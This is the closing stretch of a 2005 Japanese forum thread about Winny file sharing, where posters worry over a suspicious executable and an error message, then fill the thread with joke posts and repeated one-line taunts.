むやみやたらに落とすのは怖いですね・・・とりあえず今回はスキャンしても何も検出されなかったんでウイルス感染はしてないってことで安心しました。では失礼します
むやみやたらに落とすのは怖いですね・・・とりあえず今回はスキャンしても何も検出されなかったんでウイルス感染はしてないってことで安心しました。では失礼します
949 :[名無し]さん(bin+cue).rar:05/01/30 00:19:03 ID:inikkv/a0
それが、私たちが見た最後の944だったのです
950 :[名無し]さん(bin+cue).rar:05/01/30 00:21:30 ID:lTa/kdf10
スキャンする前に検疫項目見てみろと。
952 :[名無し]さん(bin+cue).rar:05/01/30 00:56:08 ID:jlNRrYC50
よーしテンプレいらない派のオイラがスレッド立てちゃうぞー
953 :[名無し]さん(bin+cue).rar:05/01/30 00:56:23 ID:ELqySvWn0
>>951
いままでの悪行の数々が赤裸々に載っている。
いままでの悪行の数々が赤裸々に載っている。
954 :[名無し]さん(bin+cue).rar:05/01/30 01:00:18 ID:Ki5Zf/tC0
>>953
ノートン先生の偉大なる業績の歴史、ともいうなw
ノートン先生の偉大なる業績の歴史、ともいうなw
955 :[名無し]さん(bin+cue).rar:05/01/30 01:37:48 ID:EJ9Oh5bP0
956 :[名無し]さん(bin+cue).rar:05/01/30 01:52:39 ID:CGYFY0s80
944と同じくダブクリしてしまったんですが・・・・
スキャンした結果なにも検索されませんでした。
.exeを実行したら
joke_nullporce
実行時エラー'-21471024770 (8007007e)':
オートメンション エラーです。
指定されたモジュールが見つかりません。
と出ました。
944さんもこんな感じだったのでしょうか?
スキャンした結果なにも検索されませんでした。
.exeを実行したら
joke_nullporce
実行時エラー'-21471024770 (8007007e)':
オートメンション エラーです。
指定されたモジュールが見つかりません。
と出ました。
944さんもこんな感じだったのでしょうか?
957 :[名無し]さん(bin+cue).rar:05/01/30 02:01:34 ID:NoEqhGsy0
>>955
乙です。
乙です。
958 :[名無し]さん(bin+cue).rar:05/01/30 17:07:46 ID:Yx9lsOFg0
埋め
959 :[名無し]さん(bin+cue).rar:05/01/30 17:14:16 ID:6i0Q95yh0
埋めずに普通に使って次スレに移ればいいだろ
960 :[名無し]さん(bin+cue).rar:05/01/30 17:15:59 ID:Yx9lsOFg0
誰も使ってないから埋めてるの
961 :[名無し]さん(bin+cue).rar:05/01/30 17:29:57 ID:/fPSf71Z0
取りあえず>>869の答が知りたいんだが
962 :[名無し]さん(bin+cue).rar:05/01/30 18:55:27 ID:+U1AGbZ/0
俺ならBを選ぶ。
963 :[名無し]さん(bin+cue).rar:05/01/30 23:38:38 ID:+zHW6VEV0
964 :[名無し]さん(bin+cue).rar:05/01/31 00:22:03 ID:dipf3KF50
梅
965 :[名無し]さん(bin+cue).rar:05/01/31 00:36:08 ID:dipf3KF50
梅
966 :[名無し]さん(bin+cue).rar:05/01/31 00:36:35 ID:sJxcT4PK0
メ〜
967 :[名無し]さん(bin+cue).rar:05/01/31 00:40:39 ID:dipf3KF50
竹
968 :[名無し]さん(bin+cue).rar:05/01/31 00:49:40 ID:dipf3KF50
松
969 :[名無し]さん(bin+cue).rar:05/01/31 01:53:15 ID:dipf3KF50
松竹梅
970 :[名無し]さん(bin+cue).rar:05/01/31 01:59:38 ID:f61KC1w30
マツタケ梅
971 :[名無し]さん(bin+cue).rar:05/01/31 02:38:21 ID:fp3eZYZ70
こんなに埋めしなきゃいけないなら最初から950で次スレ立てなければいいとあれほど言ったのに
972 :[名無し]さん(bin+cue).rar:05/01/31 03:22:25 ID:dRkxCCeP0
ノグチゴーヒデキ
973 :[名無し]さん(bin+cue).rar:05/01/31 03:45:39 ID:EvBe5+tM0
あわてて埋める必要もないでしょ?
使わなきゃ自然と落ちるんだし
使わなきゃ自然と落ちるんだし
974 :[名無し]さん(bin+cue).rar:05/01/31 05:14:32 ID:mQafbhmR0
勝手にひとんちで充電すんなよ
勝手にひとんちで充電すんなよ
勝手にひとんちで充電すんなよ
975 :[名無し]さん(bin+cue).rar:05/01/31 05:15:24 ID:mQafbhmR0
お前の弟がいじめられてる原因お前なんだぞ
お前の弟がいじめられてる原因お前なんだぞ
お前の弟がいじめられてる原因お前なんだぞ
976 :[名無し]さん(bin+cue).rar:05/01/31 05:16:15 ID:mQafbhmR0
お前の姉ちゃんヒゲ生えてない?
お前の姉ちゃんヒゲ生えてない?
お前の姉ちゃんヒゲ生えてない?
977 :[名無し]さん(bin+cue).rar:05/01/31 05:16:48 ID:mQafbhmR0
結局4月だけだったな、お前の人気
結局4月だけだったな、お前の人気
結局4月だけだったな、お前の人気
978 :[名無し]さん(bin+cue).rar:05/01/31 05:17:22 ID:mQafbhmR0
朝礼の時ずっとハチと戦ってたな
朝礼の時ずっとハチと戦ってたな
朝礼の時ずっとハチと戦ってたな
979 :[名無し]さん(bin+cue).rar:05/01/31 05:18:17 ID:mQafbhmR0
お前の上履き隠したの女子だぞ
お前の上履き隠したの女子だぞ
お前の上履き隠したの女子だぞ
980 :[名無し]さん(bin+cue).rar:05/01/31 05:19:09 ID:mQafbhmR0
弟の前だと、やけに強気だな
弟の前だと、やけに強気だな
弟の前だと、やけに強気だな
981 :[名無し]さん(bin+cue).rar:05/01/31 05:20:33 ID:mQafbhmR0
お前の父さん夕方のニュースでミニSLの先頭だったぞ
お前の父さん夕方のニュースでミニSLの先頭だったぞ
お前の父さん夕方のニュースでミニSLの先頭だったぞ
982 :[名無し]さん(bin+cue).rar:05/01/31 05:39:49 ID:8DHz6tBG0
繰り返すのが流行ってるのか?
それともニュイルスの症状なのか?
それともニュイルスの症状なのか?
983 :[名無し]さん(bin+cue).rar:05/01/31 05:45:58 ID:EvBe5+tM0
ふかわのネタだとおもわれ
984 :[名無し]さん(bin+cue).rar:05/01/31 11:28:01 ID:jqQnZxD50
フカワクン、ヒトコトネタヤテヨ
985 :[名無し]さん(bin+cue).rar:05/01/31 11:40:49 ID:mQafbhmR0
お前、鼻の回りが汚いんだよ
お前、鼻の回りが汚いんだよ
お前、鼻の回りが汚いんだよ
986 :[名無し]さん(bin+cue).rar:05/01/31 11:41:38 ID:mQafbhmR0
お前んちの屋根いっつもカラスとまってない?
お前んちの屋根いっつもカラスとまってない?
お前んちの屋根いっつもカラスとまってない?
987 :[名無し]さん(bin+cue).rar:05/01/31 11:42:27 ID:mQafbhmR0
最初からないのに、探すふりすんなよ!
最初からないのに、探すふりすんなよ!
最初からないのに、探すふりすんなよ!
988 :[名無し]さん(bin+cue).rar:05/01/31 11:43:10 ID:mQafbhmR0
試験監督の人、ずっとお前のこと見てたぞ
試験監督の人、ずっとお前のこと見てたぞ
試験監督の人、ずっとお前のこと見てたぞ
989 :[名無し]さん(bin+cue).rar:05/01/31 11:44:02 ID:mQafbhmR0
とび箱の中隠れてたけど、結局自分から出てきたな
とび箱の中隠れてたけど、結局自分から出てきたな
とび箱の中隠れてたけど、結局自分から出てきたな
久しぶりにWinnyを起動。
システム情報を見たら、アップファイル個数が2。
やっべー、キンタマにでも感染してたか、と思い調べてみたら
以前、炊いたコミックをupフォルダーに入れっぱなしにしてただけだった。
システム情報を見たら、アップファイル個数が2。
やっべー、キンタマにでも感染してたか、と思い調べてみたら
以前、炊いたコミックをupフォルダーに入れっぱなしにしてただけだった。